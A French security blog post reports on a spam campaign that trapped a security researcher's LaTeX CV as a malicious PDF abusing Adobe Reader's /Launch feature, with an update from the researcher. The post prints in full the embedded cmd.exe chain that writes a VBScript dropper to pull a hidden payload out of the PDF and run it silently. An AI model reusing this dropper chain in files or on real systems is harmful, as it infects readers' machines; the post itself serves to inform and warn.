Le CV d'un chercheur en sécurité diffusé avec PDF vérolé

En effet, c'est bien le CV de ce chercheur Belge en sécurité informatique et membre du CSRRT-LU (Computer Security Research and Response Team Luxembourg) qui s'est trouvé être utilisé à des fins cybercriminelles.

Un pirate a détourné le contenu du CV d'Alexandre en le piégeant avec du contenu détecté comme étant de la famille Win32/Pdfjsc avant de le faire circuler sur la toile à une très large audience.

Le document PDF Resume.pdf envoyé en spam contient un code malicieux à base de script visual basic tentant d'exécuter les commandes suivantes sur un système Windows et lancer un exécutable.

C:\WINDOWS\system32\cmd.exe /c echo Dim BinaryStream > 
vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream") 
>> vbs1.vbs && echo BinaryStream.Type = 1 >> vbs1.vbs && echo 
BinaryStream.Open >> vbs1.vbs && echo BinaryStream.LoadFromFile 
FindLastModified(".") >> vbs1.vbs && echo BinaryStream.Position=58196 
     >> vbs1.vbs && echo s = BinaryStream.Read (290708    -58196     )
 >> vbs1.vbs && echo BinaryStream.Close >> vbs1.vbs && 
echo BinaryStream.Open >> vbs1.vbs && echo BinaryStream.Write s >> 
vbs1.vbs && echo BinaryStream.SaveToFile "vbs2.vbs",2 >> vbs1.vbs && 
echo BinaryStream.Close >> vbs1.vbs && echo dim wshshell >> vbs1.vbs 
&& echo set wshshell = wscript.createobject("wscript.shell") >> vbs1.vbs 
&& echo wshshell.run "vbs2.vbs",0,FALSE >> vbs1.vbs && 
echo Function FindLastModified(strDir)   >> vbs1.vbs && echo Set objFSO = 
CreateObject("Scripting.FileSystemObject")   >> vbs1.vbs && 
echo Set oFolder = objFSO.GetFolder(strDir)   >> vbs1.vbs && 
echo d = CDate("1/1/1950")   >> vbs1.vbs && echo For Each oFile 
In oFolder.Files   >> vbs1.vbs && echo If oFile.DateLastModified ^> 
d and InStr(oFile.Name, ".pdf") ^> 0 Then   >> vbs1.vbs && echo 
NewestFile = oFile.Name   >> vbs1.vbs && echo d = oFile.DateLastModified  
 >> vbs1.vbs && echo End If   >> vbs1.vbs && echo Next   >> 
vbs1.vbs && echo FindLastModified = NewestFile   >> vbs1.vbs && 
echo End Function    >> vbs1.vbs  && vbs1.vbs
  && echo

Edit du 10 Juin :
Suite à l'article, Alexandre Dulaunoy apporte les précisions suivantes

Il serait bon de préciser deux choses :

- Les criminels cherchent des documents intéressants, les modifient et
ensuite envoient le document modifié.
En gros, ils prennent des documents au hasard pour les infectés...
donc il est bon de bien préciser, que
je n'infecte pas mon CV mais que l'on utilise mon contenu pour rentre
leur infection plus attractive.
(c'est assez amusant qu'ils prennent un CV en sécurité informatique et
de plus fait en LaTeX ;-).

- Un autre point important, c'est que l'attaque utilise la
vulnérabilité /Launch dans Adobe Acrobat Reader.

http://blogs.adobe.com/adobereader/2010/04/didier_stevens_launch_function.html

Il semble aussi (après quelques recherches dans les logs du serveur)
qu'ils cherchaient des resume/cv
en plusieurs pages pour éviter le détection avec les antivirus. Le
parsing PDF est assez nouveau
dans les antivirus et c'est pas encore de très bonne qualité.

Ce qui est dommage c'est plus vous avez du contenu intéressant sur votre
site web, le plus cela peut être utilisé par des attaquants/spammer pour rendre
une infection attractive...

[...]

adulau

Merci à lui pour ces précisions !

* le vrai cv D'alexandre J.D. Dulaunoy peut être consulté sur son site web :
- Alexandre Dulaunoy (adulau) - Home Page

Abc de la sécurité informatique

Le CV d'un chercheur en sécurité diffusé avec PDF vérolé

MENU

Annonces

Catégories

Derniers commentaires

Liens

web 2.0

S'abonner